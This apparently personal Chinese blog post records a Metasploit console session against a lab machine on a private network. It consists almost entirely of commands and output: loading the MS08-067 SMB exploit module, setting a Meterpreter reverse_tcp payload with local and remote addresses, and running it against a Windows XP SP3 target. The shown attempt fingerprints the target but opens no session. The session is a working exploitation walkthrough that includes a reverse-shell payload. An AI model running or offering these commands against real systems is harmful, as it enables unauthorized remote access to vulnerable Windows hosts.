您的位置:首页 > 其它

渗透杂记-2013-07-12

2013-07-12 10:27 295 查看
笔耕不辍




root@bt:~# msfpro
[*] Starting Metasploit Console...
[-] WARNING! The following modules could not be loaded!
[-]     /opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/local/mmap.rb: NameError uninitialized constant Msf::Post::Common
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`.         ,-,
` `.    ,;' /
`.  ,'/ .'
`. X /.'
.-;--''--.._` ` (
.'            /   `
,           ` '   Q '
,         ,   `._    \
,.|         '     `-.;_'
:  . `  ;    `  ` --,.._;
' `    ,   )   .'
`._ ,  '   /_
; ,''-,;' ``-
``-..__``--` http://metasploit.pro =[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1134 exploits - 715 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > use exploit/windows/smb//ms08_067_netapi
[-] Failed to load module: exploit/windows/smb//ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > info
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 0
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm <hdm@metasploit.com>
Brett Moore <brett.moore@insomniasec.com>
staylor
jduck <jduck@metasploit.com>
Available targets:
Id  Name
--  ----
0   Automatic Targeting
1   Windows 2000 Universal
2   Windows XP SP0/SP1 Universal
3   Windows XP SP2 English (AlwaysOn NX)
4   Windows XP SP2 English (NX)
5   Windows XP SP3 English (AlwaysOn NX)
6   Windows XP SP3 English (NX)
7   Windows 2003 SP0 Universal
8   Windows 2003 SP1 English (NO NX)
9   Windows 2003 SP1 English (NX)
10  Windows 2003 SP1 Japanese (NO NX)
11  Windows 2003 SP2 English (NO NX)
12  Windows 2003 SP2 English (NX)
13  Windows 2003 SP2 German (NO NX)
14  Windows 2003 SP2 German (NX)
15  Windows XP SP2 Arabic (NX)
16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17  Windows XP SP2 Chinese - Simplified (NX)
18  Windows XP SP2 Chinese - Traditional (NX)
19  Windows XP SP2 Czech (NX)
20  Windows XP SP2 Danish (NX)
21  Windows XP SP2 German (NX)
22  Windows XP SP2 Greek (NX)
23  Windows XP SP2 Spanish (NX)
24  Windows XP SP2 Finnish (NX)
25  Windows XP SP2 French (NX)
26  Windows XP SP2 Hebrew (NX)
27  Windows XP SP2 Hungarian (NX)
28  Windows XP SP2 Italian (NX)
29  Windows XP SP2 Japanese (NX)
30  Windows XP SP2 Korean (NX)
31  Windows XP SP2 Dutch (NX)
32  Windows XP SP2 Norwegian (NX)
33  Windows XP SP2 Polish (NX)
34  Windows XP SP2 Portuguese - Brazilian (NX)
35  Windows XP SP2 Portuguese (NX)
36  Windows XP SP2 Russian (NX)
37  Windows XP SP2 Swedish (NX)
38  Windows XP SP2 Turkish (NX)
39  Windows XP SP3 Arabic (NX)
40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41  Windows XP SP3 Chinese - Simplified (NX)
42  Windows XP SP3 Chinese - Traditional (NX)
43  Windows XP SP3 Czech (NX)
44  Windows XP SP3 Danish (NX)
45  Windows XP SP3 German (NX)
46  Windows XP SP3 Greek (NX)
47  Windows XP SP3 Spanish (NX)
48  Windows XP SP3 Finnish (NX)
49  Windows XP SP3 French (NX)
50  Windows XP SP3 Hebrew (NX)
51  Windows XP SP3 Hungarian (NX)
52  Windows XP SP3 Italian (NX)
53  Windows XP SP3 Japanese (NX)
54  Windows XP SP3 Korean (NX)
55  Windows XP SP3 Dutch (NX)
56  Windows XP SP3 Norwegian (NX)
57  Windows XP SP3 Polish (NX)
58  Windows XP SP3 Portuguese - Brazilian (NX)
59  Windows XP SP3 Portuguese (NX)
60  Windows XP SP3 Russian (NX)
61  Windows XP SP3 Swedish (NX)
62  Windows XP SP3 Turkish (NX)
63  Windows 2003 SP2 Japanese (NO NX)
64  Windows 2003 SP1 Spanish (NO NX)
65  Windows 2003 SP1 Spanish (NX)
66  Windows 2003 SP2 Spanish (NO NX)
67  Windows 2003 SP2 Spanish (NX)
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
References: http://cvedetails.com/cve/2008-4250/ http://www.osvdb.org/49243 http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.11.14
LHOST => 192.168.11.14
msf exploit(ms08_067_netapi) > set RHOST 192.168.11.18
RHOST => 192.168.11.18
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.11.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
[*] Selected Target: Windows XP SP3 Chinese - Traditional (NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions
Active sessions
===============
No active sessions.
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.11.18    yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
LHOST     192.168.11.14    yes       The listen address
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Targeting
msf exploit(ms08_067_netapi) >
貌似链接没有建立成功。


本文出自 “文东会” 博客,转载请与作者联系!
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: